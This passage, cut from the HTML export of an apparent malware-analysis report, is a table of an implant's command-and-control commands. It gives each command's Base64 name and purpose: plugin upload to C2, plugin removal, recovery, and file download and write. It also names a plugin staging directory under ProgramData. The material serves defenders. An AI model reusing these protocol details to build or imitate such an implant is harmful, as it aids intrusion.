0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">p</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">lugin to disk at the staging directory C:\ProgramData\Microsoft\whealth\</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="11" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="713713113" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{56}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">c2VuZFBsdWdpbg==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="88073306" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{63}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">sendPlugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="405610381" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{70}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Upload Plugin</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>to C2</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="12" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1854095058" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{80}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UmVtb3ZlUGx1Z2lucw==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="667575131" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{87}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RemovePlugins</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="129629195" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{94}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Remove<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">all deployed<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">plugin</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>modules</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="13" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="765915831" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{108}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UmVjb3Zlcnk=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="612644927" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{115}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Recovery</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1775383608" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{122}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Recovery<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">or reconnect routine</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="14" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1088016739" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{132}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SpellingErrorV2Themed SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; background-position: 0px 100%; background-repeat: repeat-x; background-image: var(--urlSpellingErrorV2,url(&quot;data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjQiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHBhdGggc3Ryb2tlPSIjRUIwMDAwIiBkPSJNMCAzYzEuMjUgMCAxLjI1LTIgMi41LTJTMy43NSAzIDUgMyIvPjxwYXRoIGQ9Ik0wIDBoNXY0SDB6Ii8+PC9nPjwvc3ZnPg==&quot;)); border-bottom: 1px solid transparent; -webkit-nbsp-mode: normal !important;">RFc</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="932363735" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{139}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">DW</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="443976277" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{146}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Download and write file operations</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="15" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="445646778" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{154}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Rk0=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1057520593" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{161}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; 